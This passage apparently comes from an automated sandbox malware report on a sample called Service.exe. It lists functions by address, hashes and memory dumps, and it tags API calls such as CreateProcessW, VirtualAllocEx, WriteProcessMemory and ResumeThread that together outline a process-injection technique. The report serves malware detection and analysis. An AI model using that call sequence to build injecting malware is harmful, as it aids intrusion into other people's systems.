processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B35E49

Strings

Q,, xrefs: 00B35CB9

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: CreateProcess
String ID: Q,
API String ID: 963392458-4241536049
Opcode ID: e2be5fe3585ee1bb6b616af38dd586d3ab192d7645dd83702fe02f18d1d3a7e3
Instruction ID: 1312e0e325317cba0c6fdb5ed90129726a4ed7ebd834c355cc963228f29ef7fe
Opcode Fuzzy Hash: e2be5fe3585ee1bb6b616af38dd586d3ab192d7645dd83702fe02f18d1d3a7e3
Instruction Fuzzy Hash: 0C81B074C00269DFDF21CFA9C944BEDBBF5AB49300F1091AAE508B7261DB709A89DF54

Function 00B34E40 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B35011

Strings

Q,, xrefs: 00B34E81

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: CreateProcess
String ID: Q,
API String ID: 963392458-4241536049
Opcode ID: 7c8d4768b8f3e34cf7a2fe546fdee5d232b84be4aab78a06ae311120e5adcc3f
Instruction ID: 3c5b9c753c54cccb9b78dbe6bab5ab4f5512c785aa889a42d738ebb807aa228e
Opcode Fuzzy Hash: 7c8d4768b8f3e34cf7a2fe546fdee5d232b84be4aab78a06ae311120e5adcc3f
Instruction Fuzzy Hash: 6681BF74C00269CFDF25CFA9C940BDDBBF5AB49300F1091AAE508B7261DB719A89DF54

Function 00B321F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B322C6

Strings

Q,, xrefs: 00B3221D

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: Q,
API String ID: 3559483778-4241536049
Opcode ID: bb538bf89a2856baccfe053d7917ac47182b5c4f14b02d5acf060da6e6958ffe
Instruction ID: 81072a29bac539e8ebbdabe954d6fe0cba1ea8b4669a4c2502879ad8009b4d0c
Opcode Fuzzy Hash: bb538bf89a2856baccfe053d7917ac47182b5c4f14b02d5acf060da6e6958ffe
Instruction Fuzzy Hash: 4B4177B9D042589FCF10CFA9D984ADEFBF1BB49310F24906AE818B7250D375AA45CF64

Function 00B321F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B322C6

Strings

Q,, xrefs: 00B3221D

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: Q,
API String ID: 3559483778-4241536049
Opcode ID: a763ff6705a5963944d4aaf1cd8154ddd6f0eaf139ba65c52194cc34f451a871
Instruction ID: f3954360861df7c05fae9b1d07fdf2ae889bc6823c70a3bd801cd675a2f3c73d
Opcode Fuzzy Hash: a763ff6705a5963944d4aaf1cd8154ddd6f0eaf139ba65c52194cc34f451a871
Instruction Fuzzy Hash: 8F4166B9D042589FCB00CFA9D984ADEFBF1BB49310F24906AE818B7210D375AA45CF64

Function 00B31FD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B32085

Strings

Q,, xrefs: 00B31FFD

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: MemoryProcessRead
String ID: Q,
API String ID: 1726664587-4241536049
Opcode ID: ee2e2f0b1e18138b4adfcaaa624126534a23cf7dbe743f2d9237a04f6f3aee95
Instruction ID: 1681625abeb1e4eb78ac73fc46a8f3fc178078623ebc4c9485923dc501e1456f
Opcode Fuzzy Hash: ee2e2f0b1e18138b4adfcaaa624126534a23cf7dbe743f2d9237a04f6f3aee95
Instruction Fuzzy Hash: CA4187B9D042589FCF10CFA9D984ADEFBB1BB19310F24A06AE818B7210C375A945CF64

Function 00B31FD8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B32085

Strings

Q,, xrefs: 00B31FFD

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: MemoryProcessRead
String ID: Q,
API String ID: 1726664587-4241536049
Opcode ID: 6ddd5f6b8cd1fb1f8044efc3f3434e0e7c7292d8230838b9e2f62f3cb52bd11b
Instruction ID: 316046403d1709eff71f5bd93c17cb93b60a243d28ce8745ff3383cef44a278b
Opcode Fuzzy Hash: 6ddd5f6b8cd1fb1f8044efc3f3434e0e7c7292d8230838b9e2f62f3cb52bd11b
Instruction Fuzzy Hash: 983176B9D042589FCF10CFAAD984ADEFBF1BB09310F20A06AE814B7210D375A945CF64

Function 00B320E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B32195

Strings

Q,, xrefs: 00B3210D

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: AllocVirtual
String ID: Q,
API String ID: 4275171209-4241536049
Opcode ID: f2b4a7efd056fd28ae74b53350db3c09455ae80131fa8505fcc23b8840a0c9b5
Instruction ID: 5f23129db0d8e0a1a397af25033f9a0f40294d1adff49880907674cf0db928d8
Opcode Fuzzy Hash: f2b4a7efd056fd28ae74b53350db3c09455ae80131fa8505fcc23b8840a0c9b5
Instruction Fuzzy Hash: ED3176B9D042589FCF10CFA9D984ADEFBB1BB49310F24A05AE814B7210D375A946CF64

Function 00B320F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B32195

Strings

Q,, xrefs: 00B3210D

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: AllocVirtual
String ID: Q,
API String ID: 4275171209-4241536049
Opcode ID: fdc176f975daa5b529699375bcddf0158438ae59f22865e7b0e8132fd1817648
Instruction ID: bd749fe67f1a6772c4b439869773a2992903d5e9101811b550869c89efdd49a5
Opcode Fuzzy Hash: fdc176f975daa5b529699375bcddf0158438ae59f22865e7b0e8132fd1817648
Instruction Fuzzy Hash: 0E3152B9D042589FCF10CFA9D984A9EFBB5BB09310F20A06AE918B7310D375A945CF65

Function 00B31EC1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00B31F72

Strings

Q,, xrefs: 00B31EEA

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: ContextThreadWow64
String ID: Q,
API String ID: 983334009-4241536049
Opcode ID: 7aa2da34863618b44928d7622a54dfa49df38376e845a2b1a719517502964d41
Instruction ID: 9db09d5d435669af356dcc98c7da341945d5e35fe5949448716da306f5164dd9
Opcode Fuzzy Hash: 7aa2da34863618b44928d7622a54dfa49df38376e845a2b1a719517502964d41
Instruction Fuzzy Hash: 5A31CAB5D012589FCB10CFA9D884ADEFBF1BB49314F24806AE418B7250C378AA45CF64

Function 00B31EC8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00B31F72

Strings

Q,, xrefs: 00B31EEA

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: ContextThreadWow64
String ID: Q,
API String ID: 983334009-4241536049
Opcode ID: 4909f9e7dd9ef0b49bdcb15f9f0f5408c41941069f5fab05ecc03cd8222f3df5
Instruction ID: 0fe21fd5f5a453979bdbdd70b518ccad90022a45be2df271f116535e7304700d
Opcode Fuzzy Hash: 4909f9e7dd9ef0b49bdcb15f9f0f5408c41941069f5fab05ecc03cd8222f3df5
Instruction Fuzzy Hash: 5931A6B5D012589FCB10CFAAD984ADEFBF5BB49310F24906AE418B7210D378AA45CF64

Function 00B32331 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00B323AE

Strings

Q,, xrefs: 00B32355

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: ResumeThread
String ID: Q,
API String ID: 947044025-4241536049
Opcode ID: 788dc3f81f62f002cef076d59f6906704472c52f2266dccaa7bb9d4b7530f592
Instruction ID: 50aa9f39118ec0b8c8fb6aca71b69641656b1d9ef4c38f779a9e2f6ac521af63
Opcode Fuzzy Hash: 788dc3f81f62f002cef076d59f6906704472c52f2266dccaa7bb9d4b7530f592
Instruction Fuzzy Hash: 1621AAB9D042599FCB10CFA9D884ADEFBF4BB49320F24905AE819B7310C375A945CFA4

Function 00B32338 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00B323AE

Strings

Q,, xrefs: 00B32355

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: ResumeThread
String ID: Q,
API String ID: 947044025-4241536049
Opcode ID: 10dc6939a670584ee64598a5064a62bf2e670110ebcf18398e935a1466d3a7c5
Instruction ID: b41d2b19c2c1ecd52983fcf29dd28f939506ee56fb7bbc0482952e96eadba00e
Opcode Fuzzy Hash: 10dc6939a670584ee64598a5064a62bf2e670110ebcf18398e935a1466d3a7c5
Instruction Fuzzy Hash: 1221A8B9D042199FCB10CFA9D484ADEFBF4BB09320F20905AE818B3310D375A945CFA8

Function 0097D5B8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2337734771.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_97d000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10660fe9e89f229fdb96287a2f3c0d30d2fe942d28ded54b93f1fca9b30bf0ab
Instruction ID: f57b2ac667cd4b3158ee9145b614ada88c6c22a4955669db71ec812d1694cf0f
Opcode Fuzzy Hash: 10660fe9e89f229fdb96287a2f3c0d30d2fe942d28ded54b93f1fca9b30bf0ab
Instruction Fuzzy Hash: 0221F1B6505204EFDB05DF14D9C0B26BF75FF94328F20C569E90E0A256C33AD856CAA1

Function 0097D5B3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2337734771.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_97d000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 63a92bdf45f781dc41697076e036bea1cecfcdd40c06c861f7b8ccfb4109f108
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 5A11AF76504284CFCB15CF10D5C4B16BF71FB94324F24C6A9D8090B256C33AD856CBA1

Analysis Process: Service.exePID: 4080, Parent PID: 7072COMMON

Executed Functions

Function 02C20D95 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2c20000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b964b9bb77b44bccd736b53f66f56382a7df3ad366fb3cecfa050856f3f6e104
Instruction ID: 7aed5f4471924c0f25050ba09c3156c5b0909b6e59a94ac2db427a2b20c5116c
Opcode Fuzzy Hash: b964b9bb77b44bccd736b53f66f56382a7df3ad366fb3cecfa050856f3f6e104
Instruction Fuzzy Hash: 66518F74A016528FCF0AEF75E86C6AE7FA6FB892803005A3CD046C7255EF749C19CB80

Function 02C21010 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2c20000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8715b14dded007c54f701b8d851b6409d8e9bf93dbebe565a0ead1288451b94c
Instruction ID: 03ca9719dbc2ba0dc8b7d1ef4d5533fcfc34c1cac2a7b73fea3aadf26e3f7aa8
Opcode Fuzzy Hash: 8715b14dded007c54f701b8d851b6409d8e9bf93dbebe565a0ead1288451b94c
Instruction Fuzzy Hash: DF918134B012518FCB09EF75E8686AE7FB6FB89240B005A2DD106DB3A5EF749C15CB80

Function 02C21157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2c20000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b12011d40284a3eabd73be823d0700c1da945a4df0a8db505ecdea69c09c82
Instruction ID: 271316acf4ce9bba3f373517e3959ec9b35ae25067075e2d1a350bdb72a940de
Opcode Fuzzy Hash: 72b12011d40284a3eabd73be823d0700c1da945a4df0a8db505ecdea69c09c82
Instruction Fuzzy Hash: 9F319071B01B518BDB15EB79C82816EBAE6BFC52503048E3DC157CB781EF749D088B81

Function 02C21860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2c20000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d1fede14e48a94f45dc498b1e1a56c1b47a7890f8bcafb62b7546dfbe34e87c
Instruction ID: 224379ba20401ab624be0dfc8e6aac54a23b4d815ec47f15b60faec85e5111bb
Opcode Fuzzy Hash: 5d1fede14e48a94f45dc498b1e1a56c1b47a7890f8bcafb62b7546dfbe34e87c
Instruction Fuzzy Hash: 8D216071B012159FDB44EBF9881837FBAEBEFD8250B14842ED54AD7386DE748C0587A1

Function 02C21749 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2c20000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567704a674c464709cb060271926a702fc5dac5c6b998b1b785038458b10ede5
Instruction ID: ee64da9839ad348d2be812747de1d1ee60a9401a839960a985f609c3d90f51f1
Opcode Fuzzy Hash: 567704a674c464709cb060271926a702fc5dac5c6b998b1b785038458b10ede5
Instruction Fuzzy Hash: 8E214B74A0131ADFDB49EBB9D8546ADBBB2FF88300F104A6DD105A7345EBB06A44CB51

Function 02C21750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2c20000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61fd7eefb07ec2e8904809906f20bc0a25482fb71c7bea69a977a76943e3d033
Instruction ID: f5fe789f6008c60f9c560ba77e341965640da1913736d6cd359a1477f01667a5
Opcode Fuzzy Hash: 61fd7eefb07ec2e8904809906f20bc0a25482fb71c7bea69a977a76943e3d033
Instruction Fuzzy Hash: 1B215A74A0131ADFDB49EBB9D8546ADBBB2FF88300F104A6DD105A7345EBB06A44CB51

Function 02C20939 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2c20000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6082b7645cb14cbc381b309294f8e62d6102f10e47988d9b1d404e6af3e1504c
Instruction ID: 15b6f28a064c5a837d85854dcb4a03eca310244e621df5a4f0d6d2c032c43e6b
Opcode Fuzzy Hash: 6082b7645cb14cbc381b309294f8e62d6102f10e47988d9b1d404e6af3e1504c
Instruction Fuzzy Hash: 46219D30E01218CFCB48EBB8D5557AE7BF2AF84200F5484A9C449EB795EF704E08CB81

Function 02C20848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2c20000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67968776c7467e3a2ef32d52e1fbaa8b3c405cce4dbc283e76e40ce9d176a3e4
Instruction ID: 21066eb6d0d33b71b83abea1b436d3144f06201a0920aa715eb368ed9c9aa054
Opcode Fuzzy Hash: 67968776c7467e3a2ef32d52e1fbaa8b3c405cce4dbc283e76e40ce9d176a3e4
Instruction Fuzzy Hash: 17116A34601327DFDF0EFF2AF994A457BA5F794345700AB5892049B229DAB479058F80

Analysis Process: Service.exePID: 6696, Parent PID: 7072COMMON

Executed Functions

Function 00E10D95 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2366510232.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36b3dda79308ba803c15d9228bdc7fd0e11d7ae3186b04a31e3a54cec5f39f90
Instruction ID: 3c324fce04ce15ba0c9308e45777082ee8990fefaf72bfe1826a30ded9ab0445
Opcode Fuzzy Hash: 36b3dda79308ba803c15d9228bdc7fd0e11d7ae3186b04a31e3a54cec5f39f90
Instruction Fuzzy Hash: 7F511A35A00B45CFDB09AB78E85856E7FA2FBC93003005A6CD106D73A5EFB49D05CBA1

Function 00E11010 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2366510232.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95b6b56c865ea8f11bfeab0adfc2290c6c764b91c7d8777537310438ea232c65
Instruction ID: 462a48509156a690a50905043aaf9e01796b0cb4074b387cd71125b636e4dd8c
Opcode Fuzzy Hash: 95b6b56c865ea8f11bfeab0adfc2290c6c764b91c7d8777537310438ea232c65
Instruction Fuzzy Hash: 3E916034B00605DFDB05AB78E858A6E7FB2FFC9300B105668E106DB3A5DFB49C058BA0

Function 00E11157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2366510232.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e636f4b540a2718200aa132558fde07664f05512ca64317fe4ede2a87ae9809
Instruction ID: 386d53fd86f887b58a1eb3f884d6cde7129c2aee5fae8584c46b5c8ff230caa7
Opcode Fuzzy Hash: 7e636f4b540a2718200aa132558fde07664f05512ca64317fe4ede2a87ae9809
Instruction Fuzzy Hash: 83316A31B00B41CBDB55AB79982856EBAE2BFC52103109A3DE15BDB790DFB49D048BA1

Function 00E11860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2366510232.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a68a0e01a7e1ee175b6ced49f28016d01cf80918672ad2639a98fe0a35a3184
Instruction ID: 7dec90cdb6e847abde1b013e600f6243f2ad363a01a7b790d4e77f49275e405b
Opcode Fuzzy Hash: 0a68a0e01a7e1ee175b6ced49f28016d01cf80918672ad2639a98fe0a35a3184
Instruction Fuzzy Hash: 85219071B002059BDB54ABFD881936FBAEBEFC9340B14842DE64AD7396DD748D0187B1

Function 00E11750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2366510232.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca2eb288833dd2c51e3f8fc510f9d4cf996d318abf7ce69b32707a50ae0c2b8
Instruction ID: 103d4ed5276f0bbf9d2318ef01e77f594f82d2054e83ecc71e630d7007901eec
Opcode Fuzzy Hash: 8ca2eb288833dd2c51e3f8fc510f9d4cf996d318abf7ce69b32707a50ae0c2b8
Instruction Fuzzy Hash: 56217F74A0060ADFEB45EFB8D8416ADBFB2FFC5300F1086A9D105A7355DBB46A40CB60

Function 00E10939 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2366510232.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd1932118f13385feebcc4158799ce96e5f30f81affe395dba8fb8931765e1b
Instruction ID: 9584e38db58b94fe4ca26eed7ea46169adb3bcdd7b307e82163afaf6919a3fdf
Opcode Fuzzy Hash: 0bd1932118f13385feebcc4158799ce96e5f30f81affe395dba8fb8931765e1b
Instruction Fuzzy Hash: B5218030A09348CFDB55EBB8D8153AD7FE1EF85300F1080A9D905EB296EB709E44CBA1

Function 00E10828 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2366510232.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d131ca5295366cdb699a17098c8f08d6c027e5a5a58ea6f9609593f3b9db5ca2
Instruction ID: b28fbbc5c4d78ce48917e2f698363385488b8678fcb2ad9e5aeedf126d21d0b4
Opcode Fuzzy Hash: d131ca5295366cdb699a17098c8f08d6c027e5a5a58ea6f9609593f3b9db5ca2
Instruction Fuzzy Hash: 3F21EE34505E46DFEB16EF2CF894A457FB5FB86304700AAD9D1049B22AEAF46909CB80

Function 00E10848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2366510232.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320efc333b1222f43ecbeacb7ed4301e543af7099e7fadd9dd12e81adacc3901
Instruction ID: 3f3c657198e779463517f3e7ad181512f3d79a3c7513fbf827b0f42bd2705bca
Opcode Fuzzy Hash: 320efc333b1222f43ecbeacb7ed4301e543af7099e7fadd9dd12e81adacc3901
Instruction Fuzzy Hash: C5117A34501E06DFFB16FF1CF985A457BA5F7C5304B00AA9C95049B22DEAF46909DF80

Analysis Process: Service.exePID: 4568, Parent PID: 7072COMMON

Executed Functions

Function 00C113B8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2369523943.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcb5d3ef2c8a515917f3515b022c697eebd037d1f25527f6271edbc21c4ef8f
Instruction ID: dc5a9794b222f695ddb8eb7785d908020da8c3253783427fec1f7b42c99c4033
Opcode Fuzzy Hash: 2dcb5d3ef2c8a515917f3515b022c697eebd037d1f25527f6271edbc21c4ef8f
Instruction Fuzzy Hash: 6591E735B012199BDB08AB7588547BEBBB3BFC9700F18846EE506D7394DE389C42A791

Function 00C11970 Relevance: .9, Instructions: 908COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2369523943.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6ff4d05aabcb8cca4e02717c775969f4144d3d2aa25ac1d6fa3a1b759ab4bd
Instruction ID: 9da230aeb1724f3f8b584e9518f8cf857a2e6be39effdc96d13e80be272813e0
Opcode Fuzzy Hash: dc6ff4d05aabcb8cca4e02717c775969f4144d3d2aa25ac1d6fa3a1b759ab4bd
Instruction Fuzzy Hash: CF818831B092808FCB05AB7998546BE7FF2AFC6310B1884AEC985CB257CE744846E791

Function 00C10D95 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2369523943.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6ab3c2f23dbed42a3f716d096fbf90da55274757a21195d4f559b110bf9b46e
Instruction ID: 588b44676976d66b8afccc3c92bd3c435eb4c405ec98e9b65e17def3a319f217
Opcode Fuzzy Hash: a6ab3c2f23dbed42a3f716d096fbf90da55274757a21195d4f559b110bf9b46e
Instruction Fuzzy Hash: 4C513A346006418FDB0AAB79E85CD6D7FA2FF8E2043004A7DD5468B275EF749D0AAF91

Function 00C11010 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2369523943.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d57fb739d42c229fc2fbbf635c33ffe926b665bb932176d665f436fe45d040
Instruction ID: 431b0807a0cd10633ee01c047d364f592677f70ecc4176925e32f03ec7568399
Opcode Fuzzy Hash: 37d57fb739d42c229fc2fbbf635c33ffe926b665bb932176d665f436fe45d040
